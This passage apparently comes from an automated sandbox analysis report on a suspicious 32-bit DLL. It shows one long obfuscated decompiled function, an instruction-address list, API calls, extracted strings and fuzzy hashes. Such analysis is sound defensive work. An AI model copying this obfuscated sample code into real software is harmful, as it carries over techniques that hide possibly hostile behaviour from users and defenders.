				E6E201E10(_t174);
				_t176 =  *0x6e2c59dc; // 0x5
				 *(_t400 - 0x18) =  *0x6e2c59d8 * 0x36 +  *0x6e2c5a90;
				_t286 =  *0x6e2c5a90 * 0x10e1d;
				_t178 =  *0x6e2c59d8; // 0x7c6994d4
				_t287 = 0x6e2c5a28;
				 *0x6e2c59d8 = _t178 * _t286;
				_t340 =  *0x6e2c5a90; // 0xa136430c
				_t180 =  *0x6e2c59d0; // 0xb0fc4cad
				 *0x6e2c59dc = _t176 * _t286 + (_t178 * _t286 >> 0x20);
				_t386 =  *(_t400 - 0x18);
				_t342 = _t340 + _t386 + _t180 + 0x3b;
				do {
					if( *0x6e2c5a28 != 0x27) {
						L38:
						_t183 =  *_t287 * _t342;
						 *0x6e2c59dc = 0;
						_t342 = _t183;
						_t184 = _t183 + 0x2c;
						 *0x6e2c59d8 = _t184;
						_t427 = _t184 -  *0x6e2c5a50; // 0x4e
						if(_t427 != 0) {
							goto L40;
						} else {
							_t428 = 0 -  *0x6e2c5a54; // 0x0
							if(_t428 != 0) {
								goto L40;
							}
						}
					} else {
						_t426 =  *0x6e2c5a2c; // 0x0
						if(_t426 == 0) {
							goto L40;
						} else {
							goto L38;
						}
					}
					break;
					L40:
					_t287 =  &(_t287[2]);
				} while (_t287 < "or@std@@");
				_t185 = E6E200D32();
				_t364 =  *0x6e2c5a90; // 0xa136430c
				_t49 = _t386 + 0x11dde; // 0x11dde
				 *(_t400 - 0x1c) = _t185;
				 *(_t400 - 0x28) = _t49 + _t364;
				_t291 = _t185 * 0x10e1d;
				_t186 =  *0x6e2c59dc; // 0x5
				_t188 =  *0x6e2c59d8; // 0x7c6994d4
				_t190 =  *0x6e2c59f2 & 0x0000ffff;
				 *(_t400 - 0x10) = _t188 * _t291;
				_t346 =  *0x6e2c59e6; // 0xa945
				 *(_t400 - 0x14) = _t186 * _t291 + (_t188 * _t291 >> 0x20);
				 *(_t400 - 0x34) = _t190;
				if((_t346 & 0x0000ffff) + _t190 != 0x32) {
					_t389 =  *(_t400 - 0x18) * 0x29266b;
					_t191 = _t389 * 0x37;
					__eflags = _t191;
					 *(_t400 - 0x1c) = _t191;
					_t294 = _t191;
					 *(_t400 - 0x20) = _t191;
				} else {
					_t294 =  *(_t400 - 0x1c);
					 *(_t400 - 0x20) = _t294;
					_t389 = _t294 -  *(_t400 - 0x18) *  *(_t400 - 0x18) * 0x10e1d + 0x27;
				}
				 *(_t400 - 0x30) = _t346 & 0x0000ffff;
				_t193 = 0x6e2c59e6;
				 *(_t400 - 0x18) = _t389;
				_t390 =  *(_t400 - 0x10);
				 *(_t400 - 0x24) = 0x6e2c59e6;
				do {
					if(_t294 ==  *(_t400 - 0x30)) {
						_t346 =  *(_t400 - 0x14);
						goto L48;
					} else {
						asm("cdq");
						_t195 = E6E2201E0( *_t193 & 0x0000ffff, _t346, _t390,  *(_t400 - 0x14));
						_t294 =  *(_t400 - 0x20);
						_t390 = _t195;
						 *(_t400 - 0x14) = _t346;
						_t364 = _t294 + 5 + _t390;
						 *0x6e2c5a90 = _t364;
						if(_t364 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t193 =  *(_t400 - 0x24);
							goto L48;
						}
					}
					break;
					L48:
					_t193 =  &(_t193[1]);
					 *(_t400 - 0x24) = _t193;
				} while (_t193 < 0x6e2c5a44);
				_t197 = 6;
				 *(_t400 - 0x10) = _t390;
				_t391 =  *(_t400 - 0x18);
				_t434 =  *0x6e2c5a98 - _t197; // 0x6e26e664
				if(_t434 != 0) {
					L53:
					_push(0);
					_t296 =  *(_t400 - 0x10) - 0x27 +  *(_t400 - 0x28) * 0x3d;
					__eflags = _t296;
					asm("sbb edx, eax");
					_t201 =  *(_t400 - 0x28);
				} else {
					_t435 =  *0x6e2c5a9c; // 0x0
					if(_t435 != 0) {
						goto L53;
					} else {
						_t296 =  *(_t400 - 0x10);
						_t83 = _t296 + 0x11e05; // 0x11e05
						_t201 = _t83;
					}
				}
				 *(_t400 - 0x30) = _t364;
				if( *(_t400 - 0x34) > _t364) {
					_t202 =  *(_t400 - 0x30);
				} else {
					 *0x6e2c59e0 = _t201;
					_t364 = _t364 + 2 + _t201 * 0x6d;
					 *0x6e2c5a90 = _t364;
					_t202 = _t364;
				}
				 *(_t400 - 0x14) = 0x6e2c5a0e;
				_t393 =  *(_t400 - 0x1c);
				_t297 = _t296 + _t202 + _t296 + _t391 + 0x3d;
				_push(0);
				asm("adc edx, eax");
				 *0x6e2c59d8 = _t297;
				 *0x6e2c59dc = _t346;
				do {
					if(_t393 != ( *0x6e2c59e2 & 0x0000ffff)) {
						_t94 = _t393 + 5; // 0x9c61f4f
						_t364 = _t94 + _t297;
						_push(0);
						 *0x6e2c5a90 = _t364;
						 *( *(_t400 - 0x14)) =  *( *(_t400 - 0x14)) + _t393;
						_t95 = _t393 + 0x3b; // 0x9c61f85
						_t297 = _t297 + _t95 + _t364;
						asm("adc edx, eax");
						 *0x6e2c59d8 = _t297;
						 *0x6e2c59dc = _t346;
					}
					_t208 =  *(_t400 - 0x14) - 4;
					 *(_t400 - 0x14) = _t208;
				} while (_t208 > 0x6e2c59e2);
				_t394 =  *(_t400 - 0x18);
				_t209 = 0x6e2c59e6;
				 *(_t400 - 0x10) = _t297;
				_t298 =  *0x6e2c59e6 & 0x0000ffff;
				 *(_t400 - 0x14) = _t346;
				do {
					_t347 = _t364;
					if(_t347 == _t298) {
						goto L65;
					} else {
						_t364 = ( *_t209 & 0x0000ffff) * _t347;
						_t347 = _t364;
						 *0x6e2c5a90 = _t364;
						if(5 + _t347 * 2 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t209 =  *(_t400 - 0x2c);
							_t298 =  *0x6e2c59e6 & 0x0000ffff;
							goto L65;
						}
					}
					break;
					L65:
					_t209 = _t209 + 2;
					 *(_t400 - 0x2c) = _t209;
				} while (_t209 < 0x6e2c5a44);
				_t105 = _t394 + 2; // 0x2
				 *0x6e2c59d0 = _t105 + _t347;
				_t213 = E6E201029(_t394);
				_t300 =  *0x6e2c5a90; // 0xa136430c
				_t106 = _t394 + 2; // 0x2
				_t369 = _t106 + _t300;
				 *0x6e2c5a00 = _t213;
				_t348 = _t300;
				if(_t300 >= _t369) {
					_t300 = _t369 * 0xffffffc3;
					 *0x6e2c59f2 =  *0x6e2c59f2 - _t300;
					_t348 = _t300;
				}
				_t107 = _t213 + 2; // 0x2
				_t371 = _t107 + _t348;
				 *0x6e2c59d0 = _t371;
				_t446 =  *0x6e2c5a04 - 0x1b47; // 0x0
				if(_t446 != 0) {
					_t349 =  *(_t400 - 0x10);
				} else {
					_t300 = ( *0x6e2c59e6 & 0x0000ffff) + _t348;
					_push(0);
					_t349 =  *(_t400 - 0x10) + 0x3b + _t300 * 2;
					asm("adc edi, eax");
					 *0x6e2c59d8 = _t349;
					 *0x6e2c59dc =  *(_t400 - 0x14);
					_t371 =  *0x6e2c59d0; // 0xb0fc4cad
				}
				_t395 = 0x6e2c5a0e;
				do {
					if(_t300 != ( *0x6e2c59e2 & 0x0000ffff)) {
						 *_t395 =  *_t395 + _t300;
						_t229 = _t300 + _t300;
						_t114 = _t229 + 5; // 0x5
						_t371 = _t114;
						_t115 = _t229 + 0x3b; // 0x3b
						_t300 = _t115 + _t371;
					}
					_t395 = _t395 - 4;
					_t216 = _t300;
				} while (_t395 > 0x6e2c59e2);
				_t396 =  *(_t400 - 0x18);
				_t301 = 6;
				 *0x6e2c59d0 = _t371;
				_t450 =  *0x6e2c5a02 - _t301; // 0x9c7
				if(_t450 != 0) {
					_t375 = _t371 + _t216 * 0xffffffc2;
					_t451 = _t375;
					 *0x6e2c59d0 = _t375;
				}
				_t117 = _t396 + 7; // 0x7
				 *0x6e2c5a90 = _t117 + _t349 * 2;
				E6E1FFB4A(_t396, _t451);
				_t350 =  *0x6e2c5a00; // 0x9c73d28
				_t303 = 0x6e2c5ac8;
				_t372 =  *0x6e2c59d8; // 0x7c6994d4
				do {
					_t452 = _t396 -  *0x6e2c5a18; // 0x4c
					if(_t452 != 0) {
						L80:
						_t120 = _t396 + 5; // 0x5
						 *0x6e2c59dc = 0;
						_t372 = _t120 + _t350;
						 *_t303 =  *_t303 + _t396;
						 *0x6e2c59d8 = _t372;
						asm("adc [ecx+0x4], eax");
						_t122 = _t396 + 0x3b; // 0x3b
						_t350 = _t122 + _t350 + _t372;
						 *0x6e2c5a00 = _t350;
					} else {
						_t453 = 0 -  *0x6e2c5a1c; // 0x0
						if(_t453 != 0) {
							goto L80;
						}
					}
					_t303 = _t303 - 0x10;
				} while (_t303 > 0x6e2c5a18);
				_t222 =  *0x6e2c59dc; // 0x5
				_t456 = 0 - _t222;
				if(_t456 >= 0 && (_t456 > 0 || _t350 >= _t372)) {
					_push(0);
					_t354 = _t350 - _t372 * 0x3d - _t396;
					 *0x6e2c5a58 =  *0x6e2c5a58 - _t396;
					asm("sbb [0x6e2c5a5c], eax");
					 *0x6e2c5a00 = _t354;
					asm("sbb ecx, [0x6e2c59dc]");
					_t372 = _t354 - _t372 + _t396;
					 *0x6e2c59d8 = _t372;
					asm("adc ecx, eax");
					 *0x6e2c59dc = 0;
				}
				_t305 =  *0x6e2c5a90; // 0xa136430c
				_t306 =  *0x6e2c59d0; // 0xb0fc4cad
				 *0x6e2c59d0 = _t306 + 0x3d + _t372 + _t305 * 2;
				return E6E220075(1);
			}

0x6e201285
0x6e20128c
0x6e201291
0x6e201297
0x6e2012a2
0x6e2012aa
0x6e2012b2
0x6e2012b8
0x6e2012ba
0x6e2012c0
0x6e2012c3
0x6e2012c5
0x6e2012c8
0x6e2012cb
0x6e2012d6
0x6e2012da
0x6e2012e0
0x6e2012ec
0x6e2012f2
0x6e2012f9
0x6e2012ff
0x6e201302
0x6e201308
0x6e20130e
0x6e201310
0x6e201310
0x6e20131d
0x6e201320
0x6e201325
0x6e201328
0x6e20132b
0x6e20132e
0x00000000
0x6e201330
0x6e201334
0x6e201338
0x6e20133d
0x6e20133f
0x6e20134b
0x6e20134d
0x6e201353
0x6e201359
0x6e201361
0x6e201363
0x00000000
0x6e201363
0x6e201361
0x00000000
0x6e201366
0x6e201366
0x6e201369
0x6e20136c
0x6e201375
0x6e201378
0x6e20137e
0x6e201390
0x6e201397
0x6e201397
0x6e201399
0x6e20139f
0x6e2013a2
0x6e2013a4
0x6e201380
0x6e201380
0x6e201386
0x00000000
0x6e201388
0x6e201388
0x6e201388
0x6e201386
0x6e2013bf
0x6e2013c5
0x6e2013cb
0x6e2013d1
0x6e2013d9
0x6e2013e1
0x6e2013e6
0x6e2013eb
0x6e2013f2
0x6e2013f8
0x6e2013fb
0x6e201401
0x6e201403
0x00000000
0x6e201405
0x6e20140b
0x6e201414
0x6e201419
0x6e20141b
0x6e201421
0x6e201424
0x6e201426
0x6e201432
0x6e20143a
0x6e20143c
0x6e201442
0x00000000
0x6e201442
0x6e20143a
0x00000000
0x6e201449
0x6e201449
0x6e20144c
0x6e201463
0x6e201468
0x6e201473
0x6e20147a
0x6e201483
0x6e201489
0x6e20148b
0x6e201491
0x6e20149a
0x6e2014a3
0x6e2014a9
0x6e2014a9
0x6e2014b7
0x6e2014bc
0x6e2014bf
0x6e2014c4
0x6e2014c6
0x6e2014cb
0x6e2014d0
0x6e2014d2
0x6e2014d5
0x6e2014d8
0x6e2014df
0x6e2014e4
0x6e2014e7
0x6e2014ec
0x6e2014f2
0x6e2014f9
0x6e2014fa
0x6e201501
0x6e20151c
0x6e201526
0x6e201526
0x6e20152c
0x6e201503
0x6e20150a
0x6e201514
0x6e201514
0x6e201531
0x6e201536
0x6e20153b
0x6e201544
0x6e201545
0x6e201545
0x6e20154b
0x6e201551
0x6e201558
0x6e201578
0x6e20157e
0x6e201586
0x6e20158b
0x6e20158b
0x6e20158d
0x6e20155a
0x6e20155a
0x6e201565
0x6e201570
0x6e201570
0x6e201593
0x6e201594
0x6e201595
0x6e2015bc
0x6e2015c1
0x6e2015c7
0x6e2015cc
0x6e2015d2
0x6e2015d8
0x6e2015e1
0x6e2015e3
0x6e2015e6
0x6e2015e9
0x6e2015eb
0x6e2015f5
0x6e2015f7
0x6e2015fa
0x6e2015fa
0x6e2015fc
0x6e2015ff
0x6e201607
0x6e20160c
0x6e201612
0x6e201618
0x6e201620
0x6e201623
0x6e201629
0x6e201644
0x6e20164e
0x6e201654
0x6e20162b
0x6e20162b
0x6e201631
0x00000000
0x6e201633
0x6e201633
0x6e20163d
0x6e20163d
0x6e201631
0x6e201664
0x6e201667
0x6e20166a
0x6e20166f
0x6e201671
0x6e201674
0x6e20167b
0x6e20167e
0x6e201683
0x6e20168a
0x6e20168f
0x6e201695
0x6e20169c
0x6e20169d
0x6e2016a2
0x6e2016a5
0x6e2016aa
0x6e2016ac
0x6e2016b6
0x6e2016bb
0x6e2016bd
0x6e2016c0
0x6e2016c3
0x6e2016c8
0x6e2016cd
0x6e2016d4
0x6e2016d9
0x6e2016df
0x6e2016eb
0x6e2016f6
0x6e2016f9
0x6e201707
0x6e20170e
0x6e201715
0x6e20171a
0x6e201720
0x6e201725
0x6e20172e
0x6e201733
0x6e201737
0x6e20173e
0x6e201748
0x6e20174a
0x6e20174d
0x6e201753
0x6e201755
0x6e201758
0x6e20175d
0x6e201763
0x00000000
0x6e201765
0x6e201765
0x6e20176b
0x00000000
0x00000000
0x6e20176b
0x6e201740
0x6e201740
0x6e201746
0x00000000
0x00000000
0x00000000
0x00000000
0x6e201746
0x00000000
0x6e20176d
0x6e20176d
0x6e201770
0x6e20177a
0x6e20177f
0x6e201785
0x6e20178d
0x6e201790
0x6e201793
0x6e201799
0x6e2017a2
0x6e2017ad
0x6e2017b4
0x6e2017b7
0x6e2017c3
0x6e2017c6
0x6e2017cc
0x6e2017e9
0x6e2017f0
0x6e2017f0
0x6e2017f3
0x6e2017f6
0x6e2017f8
0x6e2017ce
0x6e2017d1
0x6e2017d9
0x6e2017e4
0x6e2017e4
0x6e2017fe
0x6e201801
0x6e201806
0x6e201809
0x6e20180c
0x6e20180f
0x6e201812
0x6e201878
0x00000000
0x6e201814
0x6e20181b
0x6e20181f
0x6e201824
0x6e201827
0x6e201830
0x6e201836
0x6e201838
0x6e201840
0x6e201842
0x00000000
0x6e201842
0x6e201840
0x00000000
0x6e201845
0x6e201845
0x6e201848
0x6e20184b
0x6e201854
0x6e201855
0x6e201858
0x6e20185b
0x6e201861
0x6e20187d
0x6e201884
0x6e201889
0x6e201889
0x6e20188c
0x6e20188e
0x6e201863
0x6e201865
0x6e20186b
0x00000000
0x6e20186d
0x6e20186d
0x6e201870
0x6e201870
0x6e201870
0x6e20186b
0x6e201891
0x6e201897
0x6e2018b1
0x6e201899
0x6e201899
0x6e2018a5
0x6e2018a7
0x6e2018ad
0x6e2018ad
0x6e2018b6
0x6e2018c2
0x6e2018c5
0x6e2018c7
0x6e2018ca
0x6e2018cc
0x6e2018d2
0x6e2018d8
0x6e2018e1
0x6e2018e6
0x6e2018e9
0x6e2018eb
0x6e2018ed
0x6e2018f3
0x6e2018f6
0x6e2018fb
0x6e2018fe
0x6e201900
0x6e201906
0x6e201906
0x6e20190f
0x6e201912
0x6e201915
0x6e20191c
0x6e20191f
0x6e201924
0x6e201927
0x6e20192e
0x6e201931
0x6e201931
0x6e201935
0x00000000
0x6e201937
0x6e201941
0x6e201944
0x6e201946
0x6e201955
0x6e201957
0x6e20195a
0x00000000
0x6e20195a
0x6e201955
0x00000000
0x6e201961
0x6e201961
0x6e201964
0x6e201967
0x6e20196e
0x6e201975
0x6e20197a
0x6e20197f
0x6e201985
0x6e201988
0x6e20198a
0x6e20198f
0x6e201993
0x6e201995
0x6e201998
0x6e20199f
0x6e20199f
0x6e2019a1
0x6e2019a9
0x6e2019ab
0x6e2019b1
0x6e2019b8
0x6e2019eb
0x6e2019ba
0x6e2019c4
0x6e2019c9
0x6e2019d2
0x6e2019d5
0x6e2019d7
0x6e2019dd
0x6e2019e3
0x6e2019e3
0x6e2019ee
0x6e2019f3
0x6e2019fc
0x6e2019fe
0x6e201a01
0x6e201a04
0x6e201a04
0x6e201a07
0x6e201a0a
0x6e201a0a
0x6e201a0c
0x6e201a0f
0x6e201a11
0x6e201a19
0x6e201a1e
0x6e201a1f
0x6e201a25
0x6e201a2c
0x6e201a31
0x6e201a31
0x6e201a33
0x6e201a33
0x6e201a39
0x6e201a41
0x6e201a46
0x6e201a4b
0x6e201a51
0x6e201a56
0x6e201a5c
0x6e201a5e
0x6e201a64
0x6e201a6e
0x6e201a6e
0x6e201a71
0x6e201a76
0x6e201a78
0x6e201a7a
0x6e201a80
0x6e201a86
0x6e201a89
0x6e201a8b
0x6e201a66
0x6e201a66
0x6e201a6c
0x00000000
0x00000000
0x6e201a6c
0x6e201a91
0x6e201a94
0x6e201a9c
0x6e201aa3
0x6e201aa5
0x6e201ab0
0x6e201ab4
0x6e201ab6
0x6e201abd
0x6e201ac5
0x6e201acf
0x6e201ad5
0x6e201ad7
0x6e201add
0x6e201adf
0x6e201adf
0x6e201ae5
0x6e201af0
0x6e201afc
0x6e201b07

APIs

__EH_prolog3.LIBCMT ref: 6E20128C
GetSystemDirectoryA.KERNEL32 ref: 6E2013C5
GetTempPathA.KERNEL32(0000056D,C:\Users\user\AppData\Local\Temp\,?,6E21FF71,?,00000001,?,?,00000001,?,6E2C27E0,0000000C,6E22006E,?,00000001,?), ref: 6E201468

Strings

Y,n, xrefs: 6E201A11
cd Island, xrefs: 6E201531
C:\Users\user\AppData\Local\Temp\, xrefs: 6E201459
Y,n, xrefs: 6E2015FF
(Z,n, xrefs: 6E20170E
Y,n, xrefs: 6E201320
Y,n, xrefs: 6E20191F
Y,n, xrefs: 6E201801
Y,n, xrefs: 6E2013E1
6623, xrefs: 6E2016B1
out drop , xrefs: 6E2016C8
part , xrefs: 6E2015B5
cd Matter m, xrefs: 6E201607
6265, xrefs: 6E2014CB
DZ,n, xrefs: 6E201967
C:\Windows\system32, xrefs: 6E2013B2
DZ,n, xrefs: 6E20144C
Y,n, xrefs: 6E201915
Molecul, xrefs: 6E20167E
DZ,n, xrefs: 6E20136C
Had s, xrefs: 6E2014DF
DZ,n, xrefs: 6E20184B

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: DirectoryH_prolog3PathSystemTemp
String ID: (Z,n$6265$6623$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$DZ,n$DZ,n$DZ,n$DZ,n$Had s$Molecul$cd Island$cd Matter m$out drop $part $Y,n$Y,n$Y,n$Y,n$Y,n$Y,n$Y,n
API String ID: 3607090873-464011853
Opcode ID: 1ec597e508b1389623b27b9f2332c2d0fe6531852423472695b85293070f7f77
Instruction ID: 728cb7aee2a600c8191dd4e8088b25b04de57e2a826a6255d42a11b98fbc2278
Opcode Fuzzy Hash: 1ec597e508b1389623b27b9f2332c2d0fe6531852423472695b85293070f7f77
Instruction Fuzzy Hash: 0132C371A8161A8FCF84CFA9C49D5AD77F3BB89B14B24456BD405DB780E730E980CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E204A80, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 6E204A87
std::_Lockit::_Lockit.LIBCPMT ref: 6E204A91
int.LIBCPMT ref: 6E204AA8

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E204AE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6E204AF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6E204B16

Strings

4k,n, xrefs: 6E204A9A

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: 4k,n
API String ID: 651022567-2310321114
Opcode ID: fd993dd31e729741fb0ed1f16ed0c38dafbb1994221349c2cae0aa3e911a7adf
Instruction ID: 00ec10d4d1f6f95a13ce8117a06ad8c9da69bf17027057e75645471f1ee739ee
Opcode Fuzzy Hash: fd993dd31e729741fb0ed1f16ed0c38dafbb1994221349c2cae0aa3e911a7adf
Instruction Fuzzy Hash: 0011E176E0052E9BCF00DBE0C894AEDB77BBF54715F144A18E510AB2D0DBB49A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E24E506, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6E24F26D: RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F

_free.LIBCMT ref: 6E24E611
_free.LIBCMT ref: 6E24E628
_free.LIBCMT ref: 6E24E647
_free.LIBCMT ref: 6E24E662
_free.LIBCMT ref: 6E24E679

Strings

'n, xrefs: 6E24E559

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: 'n
API String ID: 3033488037-1397255199
Opcode ID: f94f6d175ca99acc373a45d0e58707b092431d9d589a463a1c5f8faa492288e2
Instruction ID: 0a893c57c1a0448593334c79b178121568037943c929681ed19f1f765fe0ec54
Opcode Fuzzy Hash: f94f6d175ca99acc373a45d0e58707b092431d9d589a463a1c5f8faa492288e2
Instruction Fuzzy Hash: 5951D475A1030DEFEB59CFA9C841AAAB3FAEF45725F100569E809DF250EB35E900CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E2423DD, Relevance: 9.2, APIs: 6, Instructions: 200
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__cftoe.LIBCMT ref: 6E242409
__cftoe.LIBCMT ref: 6E24243B

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: b0fcf44f40e9aa581445fd67c14509577e31a368c6cd44ece1b0b759573be088
Instruction ID: b04693f176100f01ff8d8e5a36528e08456677cf2f239af8ae628ca8f22cae23
Opcode Fuzzy Hash: b0fcf44f40e9aa581445fd67c14509577e31a368c6cd44ece1b0b759573be088
Instruction Fuzzy Hash: 8F51D8B790420EEBEB5C8BEACC51E9E77BFEB49725F104519E825E7181EF34D5008660

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E18A0, Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 6E1E18A7
std::_Locinfo::_Locinfo.LIBCPMT ref: 6E1E18D5

Part of subcall function 6E1E1450: __EH_prolog3.LIBCMT ref: 6E1E1457
Part of subcall function 6E1E1450: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E1464
Part of subcall function 6E1E1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E1E14A1

ctype.LIBCPMT ref: 6E1E18E7

Part of subcall function 6E1E1928: __Getctype.LIBCPMT ref: 6E1E1937
Part of subcall function 6E1E1928: __Getcvt.LIBCPMT ref: 6E1E1949

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E1E18F1

Part of subcall function 6E1E14CE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6E1E14F5
Part of subcall function 6E1E14CE: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1566

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_$H_prolog3LocinfoLockit$GetctypeGetcvtLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_ctype
String ID:
API String ID: 1262428101-0
Opcode ID: 397cec33d5a5ad10310109098b8cbe330d7dcd3d051be57b3ab4118e5db9cda8
Instruction ID: 3dff2b7836515da84c69f6901c1163d2e3d80ca426f2cef45d09b40a278377ee
Opcode Fuzzy Hash: 397cec33d5a5ad10310109098b8cbe330d7dcd3d051be57b3ab4118e5db9cda8
Instruction Fuzzy Hash: 61F09AB5A00B0DDFEB10DFD0C411BDDB7AAAF00B19F204818F2195B680DBB456C4DA80

Uniqueness

Uniqueness Score: -1.00%

Function 6E208499, Relevance: 3.0, APIs: 2, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::ios_base::_Init.LIBCPMT ref: 6E20849F

Part of subcall function 6E207FAF: __EH_prolog3.LIBCMT ref: 6E207FB6
Part of subcall function 6E207FAF: std::locale::_Init.LIBCPMT ref: 6E207FFF

Part of subcall function 6E208BFE: __EH_prolog3.LIBCMT ref: 6E208C05

std::ios_base::_Addstd.LIBCPMT ref: 6E2084D8

Part of subcall function 6E1E1EEA: __CxxThrowException@8.LIBVCRUNTIME ref: 6E1E1F4E

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: H_prolog3Initstd::ios_base::_$AddstdException@8Throwstd::locale::_
String ID:
API String ID: 3866902965-0
Opcode ID: f5465332d492a3dfb33428f77e15b9de503ee84fdd0bcdb1cdbea56ceb3e7f99
Instruction ID: c0f4a98545a84aa9e981bea24a43396261b634ea1d7cdfd532ad45c95d47d969
Opcode Fuzzy Hash: f5465332d492a3dfb33428f77e15b9de503ee84fdd0bcdb1cdbea56ceb3e7f99
Instruction Fuzzy Hash: 1FF0E53420071867D72497E18444B8BB7DDAF00339F00480EF4824BED0DBB5F440CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E2078D3, Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 6E2078DA
std::locale::_Init.LIBCPMT ref: 6E2078FB

Part of subcall function 6E207005: __EH_prolog3.LIBCMT ref: 6E20700C
Part of subcall function 6E207005: std::_Lockit::_Lockit.LIBCPMT ref: 6E207017
